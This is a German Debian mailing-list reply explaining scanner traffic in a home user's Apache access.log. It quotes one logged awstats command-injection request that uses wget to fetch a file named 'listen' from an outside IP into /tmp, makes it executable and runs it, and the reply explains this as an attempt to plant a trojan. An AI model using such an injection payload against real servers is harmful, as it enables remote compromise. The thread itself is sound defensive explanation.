Re: Apache access.log

To: debian-user-german@lists.debian.org
Subject: Re: Apache access.log
From: Sebastian Kayser <mls@skayser.de>
Date: Sat, 19 Nov 2005 17:40:26 +0100
Message-id: <[🔎] 20051119164026.GA2982@skayser.homeip.net>
In-reply-to: <[🔎] 437F5129.4060105@rald.info>
References: <[🔎] 437F5129.4060105@rald.info>

* Harald Tobias <h@rald.info> wrote:
> ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank 
> eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge 
> die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele 
> (Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4 
> Personen bekannt.

Das sind völlig wahllose Zugriff auf offene HTTP-Ports in
Dial-Up-Addressbereichen. Hat also nichts mit Deiner DynDNS-Domain zu
tun.

> Laut Whois habe ich aber Zugriffe aus Deutschland, China, Japan, 
> Italien, Spanien, Frankreich und weiteren Ländern. Sind dort Hacker beim 
> ausprobieren oder was passiert da?

Richtig.

> Wenn ich die Einträge richtig deute, wird häufig versucht auf Dateien 
> und Verzeichnisse zuzugreifen, die jedoch gar nicht existieren.
> 
> Beispiele:
> 
> 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] "GET 
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
>  HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Es wird versucht, über awstats - welches in letzter Zeit einige Exploits
hatte - böse Sachen zu treiben. Ich kenn den Exploit nicht im Detail,
aber es werden Kommandos eingeschleust, die einen Trojaner nachziehen
und starten.

Da Du kein awstats installiert hast, kannst Du das beruhigt ignorieren.

> 82.83.223.39 - - [15/Nov/2005:09:23:05 +0100] "OPTIONS / HTTP/1.1" 200 
> 1304 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
> 
> 82.251.49.61 - - [15/Nov/2005:12:19:01 +0100] "GET / HTTP/1.0" 200 1292 
> "-" "-"
> 
> 82.253.228.245 - - [15/Nov/2005:12:31:17 +0100] "OPTIONS / HTTP/1.1" 200 
> 1304 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"

Keine Ahnung, da greift eine Anwendung zu, die sich als
"Microsoft-WebDAV-MiniRedir/5.1.2600" ausgibt und die verfügbaren
Optionen (Operationen) Deines Webserver abquizt. 

> Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr 
> begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel 
> evtl. jemand Rechte zu verändern?

Ja, aber keine Rechte von existierenden Dateien sondern die vom
nachzuziehenden Trojaner (der bei Dir erst garnicht den Weg auf die
Festplatte findet, da Du ja kein awstat installiert hast, über das sich
ungewollterweise die Befehle einschleusen lassen können).

- sebastian

Reply to:

References:
- Apache access.log
  - From: Harald Tobias <h@rald.info>

Prev by Date: Re: Favoriten/Lesezeichen zentral auf (eigenem) Server im Inet ablegen?
Next by Date: Re: Suche Programm zum Streamen
Previous by thread: Apache access.log
Next by thread: Re: Apache access.log
Index(es):
- Date
- Thread